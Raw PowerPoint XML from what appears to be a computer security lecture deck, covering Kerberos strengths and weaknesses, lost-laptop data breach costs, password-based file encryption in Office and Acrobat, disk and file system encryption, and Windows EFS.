            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="205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930854" y="3505200"/>
            <a:ext cx="2235819"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Authentication Details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60</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44187" y="1905000"/>
            <a:ext cx="8728363" cy="3810000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9177964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 Advantages</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8305800" cy="5334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Kerberos protocol is designed to be secure even when performed over an insecure network. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Since each transmission is encrypted using an appropriate secret key, an attacker cannot forge a valid ticket to gain unauthorized access to a service without compromising an encryption key or breaking the underlying encryption algorithm, which is assumed to be secure. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kerberos is also designed to protect against replay attacks, where an attacker eavesdrops legitimate Kerberos communications and retransmits messages from an authenticated party to perform unauthorized actions. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The inclusion of time stamps in Kerberos messages restricts the window in which an attacker can retransmit messages. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tickets may contain the IP addresses associated with the authenticated party to prevent replaying messages from a different IP address.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Kerberized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> services make use of a “replay cache,” which stores previous authentication tokens and detects their reuse. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kerberos makes use of symmetric encryption instead of public-key encryption, which makes Kerberos computationally efficient</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The availability of an open-source implementation has facilitated the adoption of Kerberos.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61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36245840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 Disadvantages</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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dirty="0" smtClean="0"/>
              <a:t>Kerberos has a single point of failure: if the Key Distribution Center becomes unavailable, the authentication scheme for an entire network may cease to function. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Larger networks sometimes prevent such a scenario by having multiple KDCs, or having backup KDCs available in case of emergency. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If an attacker compromises the KDC, the authentication information of every client and server on the network would be revealed. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kerberos requires that all participating parties have synchronized clocks, since time stamps are used. </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62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16934033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Secure Storage</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63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9217410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Lost Laptops</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1447800"/>
            <a:ext cx="8229600" cy="4495800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Lost and stolen laptops are a common occurrence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Estimated occurrences in US airports every week: 12,000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Average cost of a lost laptop for a corporation is $50K</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Costs include data breach, intellectual property loss, forensics, lost productivity, legal and regulatory expenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data breach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> much more serious than hardware loss</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Encryption decreases cost by $20K</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The existence of a full backup increases cost</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Data breach cost estimated at $200 per customer record</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Direct costs include discovery, notification and response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Indirect costs include customer turnover (higher loss and lower acquisition)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Data can also be copied while laptop is unattended</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94759074-FD2C-4344-8997-BA6EDF992768}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="5867400"/>
            <a:ext cx="6172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err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Ponemon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> Institute. Research Studies &amp; White Papers: Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217215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Data Protection Scenarios</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Defending against loss of USB drives and smart phones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Defending against data-stealing malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Defending against equipment seizure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Donating decommissioned machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Recycling obsolete or faulty machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Off-site backups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Cloud storage</a:t>
            </a:r>
          </a:p>
          <a:p>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65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37132987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Password-Based File Encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1295400"/>
            <a:ext cx="7848600" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Microsoft Office 97/2003</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>40-bit encryption key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Guaranteed cracking in two weeks with standard PC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Microsoft Office 2007</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>AES encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Default 128-bit key size can be increased to 256</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Secret key derived from password by iteratively </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>hashing salted password 50,000 times with SHA-1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Adobe Acrobat 9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>AES encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>256-bit keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Secret key derived from password by hashing salted password once with SHA-256, which is faster than SHA-1 …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Elcomsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> markets password-recovery tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Crack attempts per second: 5K Office 2007 vs. 75M for Acrobat 9</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{94759074-FD2C-4344-8997-BA6EDF992768}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>66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5943600" y="2590800"/>
            <a:ext cx="3048000" cy="1866900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16237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Encryption of File Systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>isk encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Block-level encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Encryption of physical or logical drive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BitLocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> in Windows Vista and 7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TrueCrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> open source software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>File system encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>File-level encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encrypting File System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (EFS) in Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19438292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Sharing Encrypted Files</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Solution A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Encrypt file with symmetric key K</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Share K with authorized users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Users need to keep many keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>ser revocation requires redistributing new key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Solution B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Different symmetric keys K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>, …, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1" smtClean="0"/>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" err="1" smtClean="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>for authorized users </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Encrypt file multiple times with K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>, …, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1" smtClean="0"/>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" err="1" smtClean="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Inefficient in terms of space and computing time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Solution C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Encrypt file with single symmetric key K</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Encrypt K with public keys of authorized users PK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>, …, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1" smtClean="0"/>
              <a:t>PK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" err="1" smtClean="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Store with file E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" smtClean="0"/>
              <a:t>PK1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(K), …, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1" smtClean="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" err="1" smtClean="0"/>
              <a:t>PKn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(K)</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68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41057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Encrypting File System (EFS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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smtClean="0"/>
              <a:t>Available in Windows since Windows 2000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Work transparently by providing automatic encryption/decryption of files in specified folders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Protects </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> but not file name and other metadata</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Supports sharing of encrypted files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Keys unlocked on successful user login</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Latest version uses RSA, SHA-256, and AES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Protection only local to file system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>File copied to another file system is decrypted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Email attachment sent decrypted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>File content may be leaked to unprotected temporary files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Key management is cumbersome</a:t>
